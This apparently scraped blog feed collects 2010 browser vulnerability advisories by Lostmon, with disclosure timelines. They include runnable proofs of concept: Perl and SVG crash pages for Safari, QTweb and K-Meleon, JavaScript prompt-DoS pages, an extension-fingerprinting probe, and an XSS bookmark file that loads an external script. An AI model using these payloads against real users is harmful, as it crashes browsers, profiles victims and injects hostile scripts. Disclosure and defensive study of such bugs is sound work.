References: https://bugs.webkit.org/show_bug.cgi?id=35948<br />
http://code.google.com/p/chromium/issues/detail?id=37383<br />
<br />
<b>FLOCK-SA-2010-02</b><br />
<br />
Title: A malicious RSS feed can bypass cross origin protection (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4114<br />
CVEs (cve.mitre.org): CVE-2010-3262<br />
<br />
Details: <br />
A malicious RSS feed containing HTML when viewed can bypass cross-origin protection,<br />
which has unspecified impact and remote attack vectors.<br />
Credit to Lostmon Lords.<br />
<br />
<b>FLOCK-SA-2010-01</b><br />
<br />
Title: A malformed favourite can bypass cross origin protection (XSS)<br />
Impact: Moderate<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4094<br />
CVEs (cve.mitre.org): CVE-2010-3202<br />
Details: <br />
A malformed favourite imported from an HTML file, imported from another browser,<br />
or manually created can bypass cross-origin protection, which has unspecified impact<br />
and attack vectors.<br />
Credit to Lostmon Lords.<br />
References: http://www.securityfocus.com/archive/1/513214<br />
################################################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-67193764364557554622010-12-08T12:53:00.002-08:002010-12-09T13:27:17.182-08:00QTweb browser for windows 3.7(Build 063) CSS Denial of Service#########################################################<br />
QTweb browser for windows 3.7(Build 063) CSS Denial of Service<br />
Vendor URL: http://www.qtweb.net/<br />
Advisory:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html<br />
Vendor notify: NO exploit available: YES<br />
##########################################################<br />
<br />
QTweb browser for Windows is vulnerable to a denial of service<br />
condition. An attacker can exploit this issue to cause the<br />
affected browser to crash, effectively denying service to<br />
legitimate users.<br />
<br />
The following are vulnerable:<br />
<br />
QTweb for windows 3.7(Build 063)<br />
<br />
<br />
###########<br />
Sample PoC<br />
###########<br />
<br />
Generate the crash file and open it with the QTweb browser; it hangs and after around one minute it crashes with an abnormal program termination.<br />
<br />
#########################################################################<br />
# Title: QTweb browser for windows 3.7(Build 063) CSS Denial of Service PoC <br />
# Developer: http://www.qtweb.net/ <br />
# Tested: Windows 7 Ultimate 32-bit <br />
#########################################################################<br />
# <br />
#!/usr/bin/perl <br />
use strict;<br />
use warnings;<br />
my $file = "Crash_QTweb.html";<br />
# 20,000,016 repetitions of "A/" give a single CSS property value of about 40 MB<br />
my $junk = "A/" x 20000016;<br />
open(my $FILE, ">", $file) or die "cannot open $file: $!";<br />
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";<br />
print "\nCrash_QTweb.html File Created successfully\n";<br />
close($FILE);<br />
<br />
############################# EOF ############################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-74143214580006365292010-12-08T12:44:00.001-08:002010-12-08T12:45:36.734-08:00Safari for windows 5.0.2(7533.18.5) CSS Denial of Service#########################################################<br />
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service<br />
Vendor URL:http://www.Apple.com<br />
Advisory:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html<br />
Vendor notify: NO exploit available: YES<br />
##########################################################<br />
<br />
Safari for Windows is vulnerable to a denial of service<br />
condition. An attacker can exploit this issue to cause the<br />
affected browser to crash, effectively denying service to<br />
legitimate users.<br />
<br />
The following are vulnerable:<br />
<br />
safari for windows 5.0.2(7533.18.5)<br />
<br />
<br />
###########<br />
Sample PoC<br />
###########<br />
<br />
Generate the crash file and open it with Safari; it hangs and after around one minute it crashes<br />
with an abnormal program termination.<br />
<br />
#########################################################################<br />
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC <br />
# Developer: http://www.Apple.com <br />
# Tested: Windows 7 Ultimate 32-bit <br />
#########################################################################<br />
# <br />
#!/usr/bin/perl <br />
use strict;<br />
use warnings;<br />
my $file = "Crash_safari.html";<br />
# 20,000,000 repetitions of "A/" give a single CSS property value of about 40 MB<br />
my $junk = "A/" x 20000000;<br />
open(my $FILE, ">", $file) or die "cannot open $file: $!";<br />
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";<br />
print "\nCrash_safari.html File Created successfully\n";<br />
close($FILE);<br />
<br />
############################# EOF ############################<br />
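<p>The two Perl generators above (QTweb and Safari) produce the same payload: one CSS declaration whose value is about 40 MB. As an added example, not code from the advisories, here is a Node.js check of the kind a mail or proxy gateway could apply before a document reaches a browser: it measures the largest declaration value in every inline style block and rejects the document above a size limit. The limit and both sample documents are constructed for the example, and the crash-shaped sample is scaled down to 10,000 repetitions so it runs instantly.</p>

```javascript
// Added example (not from the advisories): a content-gateway check that refuses
// an HTML document whose inline <style> text contains one CSS declaration value
// above a size limit. The crash file built by the Perl scripts above is a single
// property value of about 40 MB; a limit of a few KB stops it without touching
// real stylesheets. The limit and the sample documents are constructed.

const MAX_DECLARATION_BYTES = 4096; // assumed policy limit

// Bodies of every <style ...>...</style> element, case-insensitively.
function extractStyleBlocks(html) {
  const re = /<style\b[^>]*>([\s\S]*?)<\/style>/gi;
  const blocks = [];
  let m;
  while ((m = re.exec(html)) !== null) blocks.push(m[1]);
  return blocks;
}

// Longest declaration value in a stylesheet as { property, bytes }, or null.
// Comments are stripped first so a comment cannot hide a ';' or '}'.
function longestDeclaration(css) {
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, "");
  const blockRe = /\{([^{}]*)\}/g; // plain rule blocks; nested at-rules not needed here
  let longest = null;
  let b;
  while ((b = blockRe.exec(stripped)) !== null) {
    for (const decl of b[1].split(";")) {
      const colon = decl.indexOf(":");
      if (colon < 0) continue;
      const property = decl.slice(0, colon).trim();
      const bytes = Buffer.byteLength(decl.slice(colon + 1).trim(), "utf8");
      if (longest === null || bytes > longest.bytes) longest = { property, bytes };
    }
  }
  return longest;
}

// Accept/reject verdict for one document.
function checkDocument(html, limit = MAX_DECLARATION_BYTES) {
  for (const css of extractStyleBlocks(html)) {
    const l = longestDeclaration(css);
    if (l !== null && l.bytes > limit) {
      return { accept: false, reason: `declaration '${l.property}' is ${l.bytes} bytes, limit ${limit}` };
    }
  }
  return { accept: true, reason: "no oversized CSS declaration" };
}

// Constructed samples. The second has the shape of the advisory's payload,
// scaled down from 20,000,000 repetitions of "A/" to 10,000 so it runs instantly.
const BENIGN_HTML =
  "<html><head><style type='text/css'>\nbody { color: #333; margin: 0 }\n</style></head></html>";
const CRASH_SHAPE_HTML =
  "<html>\n<head>\n<style type='text/css'>\nbody {junkprop: " + "A/".repeat(10000) + "}\n</style>\n</head>\n</html>";

console.log(checkDocument(BENIGN_HTML));
console.log(checkDocument(CRASH_SHAPE_HTML));
```

<p>Both scans are linear in the document size, but a gateway should still cap the total body size before running them; this check is for the payload that stays under a body-size cap yet is pathological in a single declaration, which is what a renderer chokes on.</p>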
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-24065016144985177962010-09-07T05:20:00.003-07:002010-09-07T05:23:30.798-07:00Google Chrome Instaled extensions arbitrary detection######################################################<br />
Google Chrome Installed extensions arbitrary detection<br />
Vendor url: http://www.google.com<br />
Advisory:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html<br />
Vendor notify:YES vendor confirmed.YES exploit:YES<br />
######################################################<br />
<br />
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
How safe is it to use extensions?<br />
An attacker can access extension resources via an iframe (at this moment I<br />
haven't found a way to alter information from extensions).<br />
<br />
like<br />
<iframe src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"></iframe><br />
for example...<br />
<br />
A remote user can modify this web doc and call it with the "base" meta tag<br />
in a malformed doc...<br />
<br />
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/"><br />
So I think that chrome-extension needs sanitization so that external web pages<br />
can't access internal resources (file:/// and other protocol handlers<br />
are safe to use and don't give access to internal resources from external<br />
web docs...)<br />
<br />
So the chrome-extension protocol handler can be used to get the extensions installed<br />
on the client browser... and then, if any extension is vulnerable to something,<br />
this information can be used to exploit that extension...<br />
<br />
In incognito mode extensions can be detected too<br />
###########################<br />
A sample PoC of detection <br />
###########################<br />
<br />
<html><br />
<head><br />
<title>Chrome extensions detector PoC By Lostmon</title><br />
</head><br />
<body><br />
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"<br />
onLoad="document.write('<br /><b>you have installed Gmail checker plus</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"<br />
onLoad="document.write('<br /><b>you have installed Web Developer</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"<br />
onLoad="document.write('<br /><b>you have installed My Shortcuts</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"<br />
onLoad="document.write('<br /><b>you have installed Firebug</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"<br />
onLoad="document.write('<br /><b>you have installed Webpage Screenshot</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"<br />
onLoad="document.write('<br /><b>you have installed Speed dial</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"<br />
onLoad="document.write('<br /><b>you have installed Downloads</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
</body><br />
</html><br />
<br />
####################EOF##########################<br />
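The PoC above restated as a small harness (an added example, not the advisory's own code) so that an extension author can check whether their extension's resources are reachable from an ordinary web origin, which they should not be once the vendor fix referenced above is applied. The ids and resource paths are the ones the PoC uses; the Image-based probe runs only in a browser, while the decision step is a pure function that runs anywhere.

```javascript
// Added example, not code from the original advisory.
// Extension ids and resource paths are the ones listed in the PoC above.
const KNOWN_EXTENSIONS = [
  { name: 'Gmail checker plus', id: 'gffjhibehnempbkeheiccaincokdjbfe', resource: 'icon_128.png' },
  { name: 'Web Developer',      id: 'bfbameneiokkgbdmiekhjnmfkcnldhhm', resource: 'icons/16.png' },
  { name: 'Firebug',            id: 'bmagokdooijbeehmkpknfglimnifench', resource: 'firebug.jpg' },
];

// chrome-extension://<id>/<path>: the same URL form the PoC puts in each <img src>.
function resourceUrl(ext) {
  return `chrome-extension://${ext.id}/${ext.resource}`;
}

// Pure decision step: given a Map of probe URL -> loaded?, name the extensions whose
// resource fired onload. A resource that fired onerror, or was never probed, counts as absent.
function namesFromProbeResults(extensions, results) {
  return extensions
    .filter((ext) => results.get(resourceUrl(ext)) === true)
    .map((ext) => ext.name);
}

// Browser side: one <img> per resource; onload/onerror is the oracle the PoC relies on.
function probeUrl(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = url;
  });
}

async function probeWithImages(extensions) {
  const results = new Map();
  for (const ext of extensions) {
    const url = resourceUrl(ext);
    results.set(url, await probeUrl(url));
  }
  return namesFromProbeResults(extensions, results);
}

// Only meaningful inside a browser page; in Node there is no Image, so only the pure step runs.
if (typeof Image !== 'undefined') {
  probeWithImages(KNOWN_EXTENSIONS).then((names) => console.log('reachable:', names));
}
```

An empty result from a web origin means none of the listed resources were served to the page, which is the outcome an extension author wants to see.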
<br />
##############<br />
Timeline<br />
##############<br />
<br />
Discovered: 27 May 2010<br />
Vendor notified: 01 Jun 2010<br />
Vendor patch: 02 Sep 2010<br />
Disclosure: 07 Sep 2010<br />
<br />
#######################€ND ########################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
Safari for Windows invalid SVG text style WebKit.dll DoS (posted 2010-08-30)<br />
###################################################<br />
Safari for Windows invalid SVG text style WebKit.dll DoS<br />
Vendor URL: www.apple.com<br />
Advisory: <a href="http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html">http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html</a><br />
Vendor notified: Yes  Exploit available: YES<br />
###################################################<br />
<br />
Safari for Windows is vulnerable to a denial of<br />
service condition. The issue affects WebKit.dll and causes a<br />
crash when Safari tries to render an SVG image whose text style<br />
carries an extremely large font-size value.<br />
<br />
<br />
<br />
############<br />
versions<br />
############<br />
<br />
Safari for Windows 5.0.1 (7533.17.8)<br />
on Windows 7 Ultimate fully patched.<br />
<br />
<br />
Safari for Windows 5.0.1 (7533.17.8)<br />
on Windows XP Home SP3 fully patched.<br />
<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered: 19-08-2010<br />
Vendor notified: 25-08-2010<br />
Vendor response: 26-08-2010<br />
Disclosure: 30-09-2010<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
Save this code as image.svg and open it with Safari. Look,<br />
I have added some "extra" pixels to the font-size text style.<br />
<br />
################ BOF image.svg ######################<br />
<br />
<?xml version="1.0"?><br />
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1"><br />
<defs><br />
<mask id="crash"><br />
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074 <br />
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074 <br />
51,121.538 129.666,119.935"<br />
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254) <br />
translate(-52.381 -37.9218)"<br />
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" /><br />
</mask><br />
</defs><br />
<br />
<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;"> <br />
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text><br />
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text><br />
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text><br />
</g><br />
<br />
</svg><br />
<br />
###############EOF####################<br />
<br />
################# €nd ###############<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
Flock Browser 3.0.0.3989 Malformed Bookmark XSS (posted 2010-08-19)<br />
#########################################<br />
Flock Browser 3.0.0.3989 Malformed Bookmark XSS<br />
Vendor URL: http://beta.flock.com/<br />
Advisory: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html<br />
Vendor notified: NO  Exploit available: YES<br />
#########################################<br />
<br />
Flock is faster, simpler, and more friendly. Literally.<br />
It's the only sleek, modern web browser with the built-in<br />
ability to keep you up-to-date with your Facebook and Twitter<br />
friends. This browser version (3.0.0.3989) is based on an old<br />
Chromium codebase.<br />
<br />
<br />
Flock has a flaw that allows cross-site scripting style attacks.<br />
In bookmarks it has a persistent XSS via a malformed bookmark title,<br />
which can be introduced when importing a malformed bookmark from another browser,<br />
when adding a new malformed bookmark, or when importing a bookmark HTML file.<br />
<br />
###############################<br />
Example Of Bookmark html file<br />
###############################<br />
<br />
<!DOCTYPE NETSCAPE-Bookmark-file-1><br />
<!-- This is an automatically generated file.<br />
It will be read and overwritten.<br />
DO NOT EDIT! --><br />
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><br />
<TITLE>Bookmarks</TITLE><br />
<H1>Menú Marcadores</H1><br />
<DL><p><br />
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A><br />
</DL><p><br />
<br />
#####################EOF##################<br />
<br />
It is a persistent script injection: when the user clicks the menu to view<br />
the favorites page, or opens the favorites URL directly, the script "defaces" that page and the user can no longer access the favorites :)<br />
( URL of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )<br />
<br />
################# €nd #######################<br />
<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
Google Chrome and Chrome Frame Prompt DoS (posted 2010-08-16)<br />
###############################################<br />
Google Chrome and Chrome Frame Prompt DoS<br />
Vendor URL: http://www.google.com<br />
Advisory: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br />
Advisory (Spanish): http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br />
Vendor notified: YES  Exploit available: YES<br />
###############################################<br />
<br />
This bug was discovered by me, and I have tested it<br />
and investigated it with Climbo from the #ayuda-informaticos<br />
channel on IRC-Hispano.<br />
<br />
#########<br />
abstract <br />
#########<br />
<br />
Sometimes web applications need to prompt users for some data;<br />
this can be done via JavaScript code or via HTML forms.<br />
<br />
In the case of JavaScript prompts, what happens if<br />
the data to prompt (the question) is very long?<br />
<br />
################<br />
<br />
Google Chrome is vulnerable to a denial of service<br />
condition via "alert prompts" when the prompted text is very long.<br />
<br />
I don't know whether this can be turned into remote code execution or<br />
memory corruption with some heap spray or similar, but I think<br />
it needs to be analyzed and patched.<br />
<br />
<br />
###################<br />
Versions Tested<br />
###################<br />
<br />
In all cases Chrome is the vector used<br />
on every system :)<br />
<br />
<br />
######################<br />
MAC OS X leopard 10.5<br />
######################<br />
<br />
Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4<br />
V8 2.1.10.15<br />
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) <br />
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4<br />
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818<br />
<br />
In all cases OS X closes all Chrome windows (Chrome crashes).<br />
<br />
<br />
##############<br />
ubuntu 10.04<br />
##############<br />
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04<br />
WebKit 533.4 <br />
V8 2.1.10.14<br />
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 <br />
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4<br />
Command Line /usr/lib/chromium-browser/chromium-browser<br />
<br />
In all cases Chrome is minimized and blocks access to the<br />
window manager buttons, and we cannot switch between the applications<br />
that we have open.<br />
<br />
<br />
##################<br />
Windows 7 32 bits<br />
###################<br />
<br />
Google Chrome 5.0.375.86 (Build oficial 49890)<br />
on Windows 7 Ultimate fully patched.<br />
<br />
It causes a DoS in Chrome, and a DoS in IE8 when<br />
exploited through Google Chrome Frame.<br />
<br />
###############<br />
Debian 2.6.26<br />
###############<br />
<br />
Google Chrome 6.0.472.25 (Build oficial 55113) dev, WebKit 534.3<br />
V8 2.2.24.11<br />
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3<br />
<br />
In all cases Debian closes all Chrome windows (Chrome crashes).<br />
<br />
<br />
####################<br />
Proof Of Concepts<br />
####################<br />
<br />
This PoC is for testing on Windows 7 32-bit, in Chrome<br />
and in Chrome Frame together with IE8, where it causes<br />
a DoS in IE8.<br />
<br />
#############################<br />
<meta http-equiv="X-UA-Compatible" content="chrome=1"><br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
This second PoC is for testing on Linux or on Mac OS X.<br />
<br />
#######################################<br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
############<br />
References<br />
############<br />
Related vuln:<br />
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
<br />
Google Chrome bug tracker:<br />
http://code.google.com/p/chromium/issues/detail?id=47617<br />
<br />
################### €nd ###################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
Safari for Windows Long link DoS (posted 2010-08-04)<br />
############################################<br />
Safari for Windows Long link DoS<br />
Vendor URL: http://www.apple.com/safari/<br />
Advisory: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html<br />
Vendor notified: Yes  Exploit available: YES<br />
############################################<br />
<br />
Safari is vulnerable to a DoS with a very long link.<br />
This issue is exploitable via web links like <a href="very long URL">click here</a><br />
or similar vectors. Safari fails to render the link,<br />
freezes, and ends in a denial of service condition.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue on Windows XP SP3 and on Windows 7 fully patched.<br />
<br />
Win XP sp3:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
windows 7 Ultimate:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered: 29-07-2010<br />
Vendor notified: 31-07-2010<br />
Vendor response:<br />
Vendor patch:<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# safari & k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS<br />
# Generate the file, open it with Safari and wait a few seconds<br />
######################################################################<br />
use strict;<br />
use warnings;<br />
<br />
# Output file name from the command line; stop if none was given<br />
my $archivo = $ARGV[0];<br />
if (!defined($archivo))<br />
{<br />
    print "Usage: $0 <archivo.html>\n";<br />
    exit 1;<br />
}<br />
<br />
# One link whose about:neterror URL carries a 1,028,135-character "c" parameter<br />
my $cabecera = "<html>" . "\n";<br />
my $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
my $fin = "</html>";<br />
<br />
my $datos = $cabecera . $payload . $fin;<br />
<br />
# Open the output file for writing and save the page<br />
open(my $fh, '>', $archivo) or die "Cannot open $archivo: $!";<br />
print $fh $datos;<br />
close($fh);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
Vendor bug tracker: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Possible related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test case: https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for support and for helping me understand the nature of this bug,<br />
and thnx to jajoni for testing it on the Windows 7 x64 version.<br />
<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
K-Meleon for Windows about:neterror Stack Overflow DoS (posted 2010-08-04)<br />
############################################<br />
K-Meleon for Windows about:neterror Stack Overflow DoS<br />
Vendor URL: http://kmeleon.sourceforge.net/<br />
Advisory: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html<br />
Vendor notified: Yes  Exploit available: YES<br />
############################################<br />
<br />
K-Meleon is an extremely fast, customizable, lightweight web browser<br />
based on the Gecko layout engine developed by Mozilla which is also <br />
used by Firefox. K-Meleon is free, open source software released under<br />
the GNU General Public License and is designed specifically for <br />
Microsoft Windows (Win32) operating systems.<br />
<br />
K-Meleon is vulnerable to crashing with a very long URL.<br />
Internal web pages like about:neterror do not limit the number of<br />
characters a user can put in the 'c' and 'd' parameters, so if we compose a<br />
malformed URL the browser crashes easily. This issue is exploitable<br />
via web links like <a href="very long URL">click here</a> or via<br />
window.location.replace('very long URL') or similar vectors.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue on Windows XP SP3 and on Windows 7 fully patched.<br />
<br />
Win XP SP3:<br />
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)<br />
K-Meleon 1.6.0a4: vulnerable (crashes)<br />
<br />
Windows 7 Ultimate:<br />
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)<br />
K-Meleon 1.6.0a4: vulnerable (crashes)<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered: 29-07-2010<br />
Vendor notified: 31-07-2010<br />
Vendor response:<br />
Vendor patch:<br />
<br />
########################<br />
ASM code stack overflow<br />
########################<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s1600/k-meleon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s200/k-meleon.png" width="200" /></a></div><br />
<br />
################<br />
Proof Of Concept<br />
################<br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS<br />
# Generate the file, open it with K-Meleon, click the link and wait a few seconds<br />
######################################################################<br />
use strict;<br />
use warnings;<br />
<br />
# Output file name from the command line; stop if none was given<br />
my $archivo = $ARGV[0];<br />
if (!defined($archivo))<br />
{<br />
    print "Usage: $0 <archivo.html>\n";<br />
    exit 1;<br />
}<br />
<br />
# One link whose about:neterror URL carries a 1,028,135-character "c" parameter<br />
my $cabecera = "<html>" . "\n";<br />
my $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
my $fin = "</html>";<br />
<br />
my $datos = $cabecera . $payload . $fin;<br />
<br />
# Open the output file for writing and save the page<br />
open(my $fh, '>', $archivo) or die "Cannot open $archivo: $!";<br />
print $fh $datos;<br />
close($fh);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
Vendor bug tracker: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Possible related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test case: https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for support and for helping me understand the nature of this bug,<br />
and thnx to jajoni for testing it on the Windows 7 x64 version.<br />
<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
IE8 on Windows 7 32-bit unspecified DoS (posted 2010-07-13)<br />
##########################################<br />
IE8 on Windows 7 32-bit unspecified DoS<br />
Vendor URL: http://www.microsoft.com<br />
Advisory: http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
Vendor notified: YES  Vendor confirmed: YES<br />
Exploit: Private<br />
###########################################<br />
<br />
A possible flaw exists in Internet Explorer 8<br />
on Windows 7 32-bit that can cause a remote<br />
denial of service from a malformed web page.<br />
<br />
This issue is triggered when IE8 tries to render a<br />
modal application prompt while a third-party application that<br />
uses IE8 resources tries to render text inputs;<br />
it is possibly a GDI text-rendering<br />
API bug, or the DrawText() functions may be involved.<br />
<br />
When the victim visits a malformed web page and closes the second<br />
application, that application becomes unstable and needs to close; then,<br />
when IE8 tries to restore<br />
the tab, it loses focus from the application, which results in<br />
a denial of service for that window, because we can't click<br />
on any bar or any button or perform any action in it;<br />
IE8 apparently is frozen.<br />
<br />
After several tests, this issue is only reproducible on Windows 7 32-bit.<br />
<br />
I have an exploit or PoC for this issue, but it's<br />
private at this time :)<br />
<br />
Solution:<br />
Microsoft treats this as a stability bug and has added it<br />
for consideration to be addressed in a future version.<br />
<br />
#################### €nd ##########################<br />
<br />
Thnx for your time !!!<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
